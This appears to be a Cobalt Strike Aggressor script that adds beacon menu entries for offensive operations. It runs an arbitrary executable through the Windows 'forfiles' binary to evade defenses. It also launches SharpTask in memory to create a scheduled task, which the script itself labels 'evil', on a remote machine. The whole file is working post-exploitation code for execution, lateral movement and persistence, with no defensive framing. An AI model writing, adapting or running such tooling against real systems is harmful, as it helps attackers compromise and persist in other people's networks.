    ###################################		         		###################################
#######################################		         		#######################################
  #####################################		         		#####################################
           ############################		  Menus 		############################
             
#################################################

#   MoveKit

#################################################

#TO BE ADDED

#################################################

#   LOLBins

#################################################

menu "LOLBins" {

#Execute Menu
	menu "Execute" {

# LOLBin 'forfiles'
item "forfiles  - T1218"{
	local('$bid');
		foreach $bid ($1){
			forfiles($bid);
		}
	}
}
}

#################################################

#   SharpTask

#################################################
item "SharpTask  - T1053"{
		local('$bid');
				foreach $bid ($1){
					sharptask($bid);
				}
			}

    ###################################		         		###################################
#######################################		         		#######################################
  #####################################		         		#####################################
           ############################		 Functions 		############################

#################################################

#   MoveKit

#################################################

#TO BE ADDED

#################################################

#   LOLBins

#################################################

#Execute

#Execute 
 
#LOLBin 'forfiles' 
sub forfiles{ 
prompt_text("Filepath To Executable", "", lambda({ 
brun($bids, "forfiles.exe /p c:\\windows\\system32 /m notepad.exe /c $1"); 
}, $bids => $1)); 
}

#################################################

#   SharpTask

#################################################

sub sharptask{
$bid = $1;
$dialog = dialog("Set up a Scheduled Task with Windows APIs", %(Computer => "", Time => "", Folder => "", Task_Name => "", Task_Description => "", Path_to_EXE => "", execmethod => "Execute-Assembly"), lambda({   
$cmdargs = "";
$cmdargs = "$3['Computer'] $3['Time'] $3['Folder'] $3['Task_Name'] $3['Task_Description'] $3['Path_to_EXE']"; 
if ($3["execmethod"] eq "Execute-Assembly"){  
btask($bid, 'Running an Evil Scheduled Task');  
bexecute_assembly($bid, script_resource('/exe/SharpTask.exe'), "--AddTask $cmdargs");    
}
}));
# Dialog box contents and text boxes mapped to command line argument keys   
    dialog_description($dialog, "Enter The Following Information To Create A Scheduled Task On A Remote Machine:");
    drow_text($dialog, "Computer",  "Computer");
    drow_text($dialog, "Time",  "Time");
    drow_text($dialog, "Folder",  "Folder");
    drow_text($dialog, "Task_Name",  "Task Name");
    drow_text($dialog, "Task_Description",  "Task Description");
    drow_text($dialog, "Path_to_EXE",  "Path To Executable");
    dbutton_action($dialog, "Run");
	dialog_show($dialog);
}
